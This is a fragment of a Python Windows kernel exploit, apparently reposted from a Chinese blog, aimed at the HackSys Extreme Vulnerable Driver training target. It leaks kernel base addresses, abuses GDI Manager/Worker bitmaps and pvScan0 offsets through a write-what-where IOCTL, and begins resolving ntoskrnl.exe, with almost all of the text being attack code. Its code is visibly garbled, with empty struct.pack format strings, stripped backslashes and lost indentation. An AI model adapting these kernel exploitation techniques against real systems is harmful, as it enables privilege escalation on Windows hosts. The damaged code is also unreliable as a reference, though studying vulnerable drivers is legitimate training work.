# Call NtQuerySystemInformation second time with right size
system_information = create_string_buffer(systeminformationlength.value)
ntdll.NtQuerySystemInformation(11, system_information, len(system_information), byref(systeminformationlength))
# Read first 4 bytes which contains number of modules retrieved
module_count = c_ulong(0)
module_count_string = create_string_buffer(system_information.raw[:8])
ctypes.memmove(addressof(module_count), module_count_string, sizeof(module_count))
# Marshal each module information and store it in a dictionary
system_information = create_string_buffer(system_information.raw[8:])
for x in range(module_count.value):
smi = SYSTEM_MODULE_INFORMATION()
temp_system_information = create_string_buffer(system_information.raw[sizeof(smi) * x: sizeof(smi) * (x+1)])
ctypes.memmove(addressof(smi), temp_system_information, sizeof(smi))
module_name = smi.FullPathName.split('\')[-1]
modules[module_name] = smi
#debug_print ("rn[+] NtQuerySystemInformation():")
# Get base addresses and return them in a list
base_addresses = []
for input_module in input_modules:
try:
base_address = modules[input_module].ImageBase
#debug_print ("t[-] %s base address: 0x%X" % (input_module, base_address))
base_addresses.append(base_address)
except:
base_addresses.append(0)
return base_addresses
def main():
global hManager
global hWorker
hevDevice = kernel32.CreateFileA("\\.\HackSysExtremeVulnerableDriver",0xc0000000,0,None,0x3,0,None)
if not hevDevice or hevDevice == -1:
print "[-] Couldn't get Device Driver handle."
sys.exit(0)
findHMValidateHandle()
debug_print ("[>] Setting up Manager Bitmap:")
debug_print ("t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
dwReturn = c_void_p()
gdi32.CreateBitmap.restype = HBITMAP
hManager = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # Win10x64RS2 size = 0x1020
debug_print ("t[+] Manager Bitmap handle: 0x%X" % hManager)
hManager_pvscan0_off = dup_address + 0x50
debug_print ("t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_off)
debug_print ("[>] Setting up Worker Bitmap:")
debug_print ("t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
dwReturn = c_void_p()
gdi32.CreateBitmap.restype = HBITMAP
hWorker = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # size = 0x1020
debug_print ("t[+] Worker Bitmap handle: 0x%X" % hWorker)
hWorker_pvscan0_off = dup_address + 0x50
debug_print ("t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_off)
write_where = struct.pack("", hManager_pvscan0_off)
write_what_object = struct.pack("", hWorker_pvscan0_off)
write_what_object_ptr = id(write_what_object) + 0x20
write_what_final = struct.pack("", write_what_object_ptr)
buf = write_what_final + write_where
buflen = len(buf)
kernel32.DeviceIoControl(hevDevice,0x22200B,buf,buflen,None,0,byref(c_ulong()),None)
kernelImage = "ntoskrnl.exe"
kernelImageBase = find_kernelBase(kernelImage.split())[0]
kernel32.LoadLibraryA.restype = HMODULE
hKernelImage = kernel32.LoadLibraryA(kernelImage)
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
